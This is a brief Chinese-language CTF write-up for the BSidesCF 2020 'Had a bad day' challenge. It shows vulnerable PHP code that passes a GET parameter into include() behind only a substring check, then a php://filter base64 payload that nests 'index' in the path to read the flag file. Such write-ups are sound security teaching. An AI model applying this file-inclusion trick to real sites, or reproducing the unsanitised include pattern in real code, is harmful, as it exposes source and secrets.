[BSidesCF 2020]Had a bad day--利用php:filter伪协议嵌套

题目比较简单直接解题吧。
从报错信息可以看出,里面有include函数。并且发现他拼接了一个.php后缀
[BSidesCF 2020]Had a bad day--利用php:filter伪协议嵌套_第1张图片解码:
[BSidesCF 2020]Had a bad day--利用php:filter伪协议嵌套_第2张图片


			$file = $_GET['category'];
			if(isset($file))
			{
				if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
					include ($file . '.php');
				}
				else{
					echo "Sorry, we currently only support woofers and meowers.";
				}
			}
			?>

发现只要包含三个字符串中的一个就能正常执行。利用PHP伪协议的嵌套。
php://filter/read=convert.base64-encode/index/resource=flag
[BSidesCF 2020]Had a bad day--利用php:filter伪协议嵌套_第3张图片

你可能感兴趣的:([BSidesCF 2020]Had a bad day--利用php:filter伪协议嵌套)